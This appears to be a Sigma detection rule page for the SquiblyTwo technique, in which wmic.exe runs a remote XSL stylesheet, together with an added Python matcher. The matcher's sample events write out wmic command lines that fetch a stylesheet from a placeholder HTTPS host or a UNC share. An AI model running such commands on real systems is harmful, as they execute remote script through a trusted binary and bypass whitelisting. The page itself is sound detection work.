
Potential Remote SquiblyTwo Technique Execution

Detects potential execution of the SquiblyTwo technique, which abuses the WMI command-line utility wmic.exe to run attacker-controlled script. When wmic.exe is given a /format: switch that points at an XSL (eXtensible Stylesheet Language) stylesheet, the XSLT processor executes any JScript or VBScript embedded in that stylesheet, so a signed, trusted Microsoft binary ends up running arbitrary code and application whitelisting is bypassed. The stylesheet is typically fetched from a remote source over HTTP/HTTPS or from a UNC path and executed in memory inside the wmic.exe process, so the script never has to be written to disk as a separate file. This is a common LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution. The rule identifies wmic.exe by image name, original file name or import hash (to catch renamed copies) and requires a /format: or -format: switch together with a URL scheme or UNC path prefix on the command line.

Author: Markus Neis, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)

Log Source
Product: windows
Category: process_creation

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic (2 selectors)
detection:
    selection_pe:
        - Image|endswith: '\wmic.exe'
        - OriginalFileName: 'wmic.exe'
        - Hashes|contains:  # Sysmon field hashes contains all types
              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'
              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'
              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'
              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'
              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'
    selection_cli:
        CommandLine|contains|windash: '/format:'
        CommandLine|contains:
            - '://'
            - '\\\\'
    condition: all of selection_*
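To make the two selectors concrete, the following is an added example (not part of the Sigma rule, the page, or any Sigma backend) that re-implements this rule's matching logic in Python and runs it over a handful of constructed process creation events. It assumes Sigma's case-insensitive string matching, that the windash modifier expands a leading "/" into "/", "-" and the Unicode dashes accepted by the current Sigma specification (older backends expand only "/" and "-"), and that the rule's '\\\\' value denotes two literal backslashes, i.e. a UNC path prefix. The Sysmon Hashes field is assumed to carry the comma-separated "ALG=VALUE" pairs Sysmon emits.

```python
"""
Added example: a minimal matcher for the SquiblyTwo Sigma rule above.
This is illustrative code written for this page, not a Sigma backend and
not code from the rule's authors.
"""
from __future__ import annotations

# Assumption: dashes produced by Sigma's windash modifier for a leading "/".
WINDASH_CHARS = ("/", "-", "\u2013", "\u2014", "\u2015")

# Import hashes listed in selection_pe (copied from the rule).
IMPHASHES = (
    "IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E",
    "IMPHASH=37777A96245A3C74EB217308F3546F4C",
    "IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206",
    "IMPHASH=B12619881D79C3ACADF45E752A58554A",
    "IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00",
)


def _field(event: dict, name: str) -> str:
    """Fetch a field as a lower-cased string; Sigma string matching is case-insensitive."""
    return str(event.get(name, "")).lower()


def windash_variants(value: str) -> list[str]:
    """Expand a value that starts with '/' or '-' into every windash spelling."""
    if value[0] not in ("/", "-"):
        raise ValueError("windash values must start with '/' or '-'")
    return [dash + value[1:] for dash in WINDASH_CHARS]


def selection_pe(event: dict) -> bool:
    """List-of-maps selector: any one of the three identification methods suffices."""
    image = _field(event, "Image")
    original = _field(event, "OriginalFileName")
    hashes = _field(event, "Hashes")
    return (
        image.endswith("\\wmic.exe")                      # Image|endswith
        or original == "wmic.exe"                         # OriginalFileName
        or any(h.lower() in hashes for h in IMPHASHES)    # Hashes|contains (OR list)
    )


def selection_cli(event: dict) -> bool:
    """Map selector: both keys must hold; the contains list is an OR."""
    cmd = _field(event, "CommandLine")
    has_format = any(v in cmd for v in windash_variants("/format:"))
    has_remote = "://" in cmd or "\\\\" in cmd             # URL scheme or UNC prefix
    return has_format and has_remote


def matches(event: dict) -> bool:
    """condition: all of selection_*"""
    return selection_pe(event) and selection_cli(event)


# Constructed sample events (not real telemetry).
EVENTS = [
    {   # 1: textbook SquiblyTwo, stylesheet fetched over HTTPS
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": 'wmic os get /format:"https://example.invalid/payload.xsl"',
    },
    {   # 2: renamed binary, caught by OriginalFileName; UNC source and '-' dash
        "Image": r"C:\Users\Public\report.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": r"report.exe process get -format:\\fileserver\share\tpl.xsl",
    },
    {   # 3: benign local use of a built-in format, no remote source
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": "wmic logicaldisk get /format:csv",
    },
    {   # 4: renamed copy with a stripped version resource; only the import hash matches
        "Image": r"C:\Temp\x.exe",
        "Hashes": "SHA256=0000000000000000000000000000000000000000000000000000000000000000,"
                  "IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E",
        "CommandLine": "x.exe process list /format:http://example.invalid/a.xsl",
    },
    {   # 5: same switches but not wmic at all, so selection_pe fails
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": 'powershell -c "wmic os get /format:https://example.invalid/a.xsl"',
    },
    {   # 6: en dash (U+2013) before format:, covered only because of windash
        "Image": r"C:\Windows\System32\wbem\wmic.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": "wmic os get \u2013format:https://example.invalid/a.xsl",
    },
]


def evaluate(events: list[dict]) -> list[bool]:
    """Return one verdict per event, in order."""
    return [matches(e) for e in events]


if __name__ == "__main__":
    for idx, verdict in enumerate(evaluate(EVENTS), start=1):
        print(f"event {idx}: {'ALERT' if verdict else 'no match'}")
```

Event 3 is the important negative: a local /format:csv is exactly what an administrator types, and it is the "://" or "\\" requirement in selection_cli, not the /format: switch alone, that keeps the rule from firing on it. Event 6 shows why the windash modifier matters: without it, a copy-pasted en dash would slip past a plain "/format:" substring check.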
False Positives
Unknown

False positive likelihood has not been assessed. Note that legitimate administrative use of wmic with a /format: switch that points at an XSL template on a network share or web server satisfies the same logic, so triage should confirm where the stylesheet was loaded from and whether that location is an approved source.

Rule Metadata
Rule ID
8d63dadf-b91b-4187-87b6-34a1114577ea
Status
test
Level
high
Type
Detection
Created
Wed Jan 16
Modified
Sat Jan 24
Path
rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml
Raw Tags
attack.defense-evasion
attack.t1047
attack.t1220
attack.execution
attack.t1059.005
attack.t1059.007